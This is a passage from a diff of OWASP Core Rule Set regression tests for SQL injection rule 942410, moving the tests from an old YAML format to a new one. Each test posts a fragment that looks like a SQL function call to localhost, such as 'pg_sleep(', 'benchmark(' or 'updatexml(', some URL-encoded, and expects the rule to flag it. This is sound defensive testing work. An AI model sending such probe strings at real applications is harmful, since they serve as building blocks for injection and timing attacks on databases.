text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ord(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-72 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "password?(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-73 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "password/?(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-74 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Password>$(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-75 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pg_sleep(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-76 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pi(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-77 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "PI(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-78 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pow(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-79 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "POW(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-80 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "quarter. (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-81 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "rand(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-82 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Rand (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-83 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "RAND(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-84 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "replace(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-85 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "REPLACE(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-86 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "round (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-87 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "round(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-88 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "rtrim(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-89 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "RTRIM(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-90 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sin (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-91 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SIN(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-92 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sleep(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-93 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SLEEP (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-94 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=strcmp(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-95 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=substr(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-96 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SUBSTR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-97 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=substring(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-98 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SUBSTRING(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-99 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sysdate(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-100 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "time (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-101 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=time%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-102 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=trim%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-103 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=Uncompress+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-104 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=unhex%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-105 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=uNhEx%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-106 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=updatexml%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-107 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=UpdateXML%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-108 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=UPPER%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-109 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=user+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-110 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=user%2F%3F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-111 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=user%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-112 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=values+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-113 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=VALUES%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-114 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=version%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-115 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=version%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-116 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xmltype%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-117 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=XMLType%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-118 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=year%5D%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" + - test_id: 1 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ABS(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 2 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "benchmark(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 3 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BENChmARk(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 4 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "cast(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 5 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "CAST(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 6 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "char(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 7 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "chaR(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 8 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "chr(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 9 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "CHR(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 10 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "COALESCE(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 11 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Compress (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 12 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "concat (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 13 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "cOnCaT(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 14 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "concat_ws(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 15 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "convert(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 16 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "cOnVeRt(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 17 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "COS(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 18 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "COUNT(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 19 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "CURRENT_USER(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 20 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "database (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 21 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "date(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 22 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=date%5D%3D%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 23 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=day.+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 24 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=day%26%27%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 25 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=decode%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 26 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=default%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 27 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ELT%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 28 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 